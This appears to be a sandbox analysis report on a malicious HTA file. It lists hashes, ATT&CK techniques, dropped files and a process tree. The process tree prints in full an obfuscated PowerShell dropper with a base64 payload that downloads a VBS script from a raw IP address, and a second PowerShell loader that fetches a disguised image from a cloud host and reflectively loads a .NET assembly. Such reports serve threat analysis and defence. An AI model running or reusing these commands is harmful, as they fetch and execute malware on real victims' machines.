4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09-01-2025 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073.hta
Size

108KB
MD5

b7bd51ea4a3cbb85901f5e467009beaa
SHA1

2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
SHA256

4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
SHA512

0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032
SSDEEP

384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20

exe.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2080	powershell.exe
6	380	powershell.exe
8	380	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
380	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2080	powershell.exe
380	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	380	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 2464	2344	mshta.exe	31
PID 2344 wrote to memory of 2464	2344	mshta.exe	31
PID 2344 wrote to memory of 2464	2344	mshta.exe	31
PID 2344 wrote to memory of 2464	2344	mshta.exe	31
PID 2464 wrote to memory of 2080	2464	cmd.exe	33
PID 2464 wrote to memory of 2080	2464	cmd.exe	33
PID 2464 wrote to memory of 2080	2464	cmd.exe	33
PID 2464 wrote to memory of 2080	2464	cmd.exe	33
PID 2080 wrote to memory of 3008	2080	powershell.exe	34
PID 2080 wrote to memory of 3008	2080	powershell.exe	34
PID 2080 wrote to memory of 3008	2080	powershell.exe	34
PID 2080 wrote to memory of 3008	2080	powershell.exe	34
PID 3008 wrote to memory of 2172	3008	csc.exe	35
PID 3008 wrote to memory of 2172	3008	csc.exe	35
PID 3008 wrote to memory of 2172	3008	csc.exe	35
PID 3008 wrote to memory of 2172	3008	csc.exe	35
PID 2080 wrote to memory of 2132	2080	powershell.exe	37
PID 2080 wrote to memory of 2132	2080	powershell.exe	37
PID 2080 wrote to memory of 2132	2080	powershell.exe	37
PID 2080 wrote to memory of 2132	2080	powershell.exe	37
PID 2132 wrote to memory of 380	2132	WScript.exe	38
PID 2132 wrote to memory of 380	2132	WScript.exe	38
PID 2132 wrote to memory of 380	2132	WScript.exe	38
PID 2132 wrote to memory of 380	2132	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jhzjyvkf.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3008
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF58.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDF48.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2172
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2132
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabFCD8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDF58.tmp

Filesize
1KB

MD5
3f8ab3b71a807823a91b8a53dded6cf5

SHA1
1ee803815b9e198e3ef5e58fe8cd0dcf1e033940

SHA256
2045e1cb508c16cee5b3489ed432808693a550b860009014f7c3647ae78d778e

SHA512
89377cf2928c022f150e45b8b77fc92a63d4120e8d196bea0e4caca91369e2b442e813718b880a231891aab58a4f97011a833d16745e5caf34dbd1dc1b699be2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFCEA.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhzjyvkf.dll

Filesize
3KB

MD5
8834b6de820e1a63aa1b6e2fc174350c

SHA1
f0a630f2f58523dd2cf8f8c302bf5647dd0b41c7

SHA256
66b60a8681205913a4b85d4dc8674d2a77077be55f4a570a31f91f54d728c634

SHA512
b0d1c22181f226fbb0d296bf0b4ae403e1b616b77ce89e5a0b34392e554476bd53a426612b6ff4f6b38489cc023ec4c5bd56478325c86e95cf391d70a4079e8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhzjyvkf.pdb

Filesize
7KB

MD5
8ca4007e8919f55c739711a946fe7ac3

SHA1
1e44875a954c9e8855c2357a7c61607cb35f5d1d

SHA256
b1e4e0d179659f821af1415a8372f85bfaf30b40a4d24cdd174808b95b1bcb53

SHA512
30e31d8bddc623677916aba5c044d89a984ed6be15260eefd839f1510217efd89474ec2623a14c108d1291ea3a42a9d8ecbf149517476e7ba5dc5fe92e723aa3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ae78ec62a7a9fd2e2931e347e700a644

SHA1
670e59863c8fc982daecd76cb376b3f761e9e81d

SHA256
9e4fda60493fbe43652df83108271b3d225e78049158ac608eb28ca011187be4

SHA512
60f01cf59d3cd8fdba1c72ec20c933148ccab3aaa8a1af91025c1825579764d119d3fe88b17e7c386f05c031cb2827364826058ddb7d44bb35127b302fd9b69c

Download Submit
C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS

Filesize
219KB

MD5
8ccd875893cd23b67d7c61ea735f5c52

SHA1
6171c7dd4f67a67fff0ca151c7e9a06104e00def

SHA256
16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392

SHA512
3ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDF48.tmp

Filesize
652B

MD5
b892c9920dee311b3a367d0a8984badd

SHA1
594fd100a47b4a145f70ea3df99fbf1752433ef2

SHA256
5f6c3dd63dad6bc4ccbeef31160a47be40002d6e2ad601af3474b3fe70aad32d

SHA512
bba3f8235ebf49ae3efdfbe32258a7c410a2fc66ae7407069fd050f5a0d590cb9395dad4938722bb5ef43c8b0d972f4d047ef6b0fff76434143152e81f866719

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jhzjyvkf.0.cs

Filesize
478B

MD5
7836723690e40c9d8fbf78fbd248c066

SHA1
6a0f9fb57575624ad9ca54108abb75cb6b20fd3d

SHA256
a1dd056c3c937dd2fef8d026745f706da97f13205feba1bdae492d4b2cad07a9

SHA512
10c093f3aaef531e31196afcc50fe7d554eee7d49206046f0d0a6dd86f23ce73067a7b926b6acac810a5d33ecc98b605b1ff1e6eaf0d404a4c1d9265f8ac06a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jhzjyvkf.cmdline

Filesize
309B

MD5
05dbea63a4082e033df8b8702c7cead4

SHA1
b575e2082310b47c614c6ccbb09f814273e9eb2f

SHA256
68b9d17552c46e28b47b1836bed8f5a5c894ed83a29c40aec4e55946b600b510

SHA512
71c8445436204a6ea5bd3591e4120cd4bb46492a449cb133a96787842eba11c0428b3b4baf6f4b7d20ee2eb14eccf0d8435ead3229e40ac2a6df2bb9aa62b5e6

Download Submit